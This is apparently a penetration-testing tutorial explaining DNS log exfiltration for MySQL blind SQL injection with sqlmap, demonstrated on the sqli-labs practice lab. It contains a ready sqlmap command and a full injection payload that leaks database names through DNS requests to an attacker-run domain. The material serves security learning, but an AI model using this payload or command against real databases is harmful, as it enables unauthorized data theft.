In daily penetration testing work, we often encounter cases of SQL time-based blind injection. Everyone knows that time-based blind injection is very slow and is also affected by network latency. Although DNS log injection can greatly improve the efficiency of time-based blind injection, there are still many limitations in practical scenarios due to environmental factors.
You need to purchase a domain name and configure the domain server to your own VPS, or use a third-party DNS log platform.
Prerequisites for DNS log injection
- Only supports Windows systems and UNC paths
- secure_file_priv is set to empty
The second point is not the default configuration.
Meaning of secure_file_priv
- When the value of secure_file_priv is null, it means that mysqld is restricted from importing/exporting
- When the value of secure_file_priv is /tmp/, it means that mysqld is restricted to import/export only in the /tmp/ directory
- When secure_file_priv has no specific value, it means that mysqld is not restricted from importing/exporting
You need to modify my.ini to set it.
If not enabled, load_file will return null.
Manual DNS log injection
DNS log injection requires a third-party DNS log platform to receive DNS exfiltrated data. However, you can actually use sqlmap’s built-in DNS receiving module instead of a third-party DNS log platform.
This module is located in sqlmap’s directory: ./lib/request/dns.py
Running it will listen on port 53 to obtain DNS request information.
[root@VM-4-7-centos ~]# cd sqlmap/ [root@VM-4-7-centos sqlmap]# ls data doc extra lib LICENSE plugins README.md sqlmapapi.py sqlmapapi.yaml sqlmap.conf sqlmap.py tamper thirdparty [root@VM-4-7-centos sqlmap]# python3 ./lib/request/dns.py
Using the DNS log exfiltration method, we obtained the current database name and database version information.
Using the –dns-domain parameter in sqlmap for injection
Here, we take the 9th level of sqli-labs as an example. This level is a time-based blind injection. However, the efficiency of time-based blind injection is too low, so switching to DNS log injection is much faster.
python3 sqlmap.py -u "http://YOUR-URL/sqli/Less-9/?id=1*" --batch --dns-domain=YOUR-DOMAIN -v3 --dbs
Here, I used my own domain name, and the domain server must point to the IP of this VPS.
If the target does not support DNS log injection, sqlmap will report an error:
[ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
Payload analysis
1 AND (
SELECT 8357
FROM (
SELECT SLEEP(5 - IF(ORD(MID((
SELECT LOAD_FILE(CONCAT('\\\\jLp.', (
SELECT HEX(MID(DISTINCT(IFNULL(CAST(schema_name AS NCHAR), 0x20)), 1, 31))
FROM INFORMATION_SCHEMA.SCHEMATA
LIMIT 4, 1
),'.uYO.ack.red\\JCKK'))
), 9, 1)) > 327, 0, 5))
) OSfI
)-- EVDk
sqlmap’s approach is to concatenate the queried content into the domain name through multiple levels of subdomains. Taking the above SQL statement as an example, the final DNS request generated is:
\\jLp.query result.uYO.ack.red\JCKK
The server receives the request and then concatenates the results of multiple queries from the domain name to complete the DNS log injection.
Priority issue of DNS log injection
[WARNING] option ‘–dns-domain’ will be ignored as faster techniques are usable (EU)
When an injection specifies the –dns-domain parameter, but sqlmap finds other more efficient methods, sqlmap will ignore the DNS injection method and use other more efficient injections.
